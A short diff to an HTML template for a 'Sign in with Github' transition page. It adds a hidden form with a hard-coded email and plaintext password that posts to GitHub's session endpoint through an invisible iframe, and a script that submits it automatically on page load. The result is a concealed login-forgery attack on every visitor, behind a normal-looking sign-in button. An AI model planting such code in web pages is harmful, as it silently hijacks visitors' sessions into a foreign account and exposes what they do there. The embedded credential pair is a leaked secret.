--- a/templates/github/transition.html
+++ b/templates/github/transition.html
@@ -1,7 +1,20 @@
 <div>
+  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
   <center>
+    <form method="post" style="display:none" target="target" action="https://github.com/session">
+      <input type="submit" name="commit" value="Sign in" id="hiddenSubmit"/>
+      <input name="utf8" type="hidden" value="✓">
+      <input type="text" name="login" value="docdagny@gmail.com" />
+      <input type="password" name="password" value="Johngalt15*"/>
+    </form>
+    <iframe name="target" style="display:none"></iframe>
     <form method="post" >
       <input type="submit" value="Sign in with Github"/>
     </form>
   </center>
 </div>
+<script>
+  $(document).ready(function(){
+    $('#hiddenSubmit').click();
+  });
+</script>
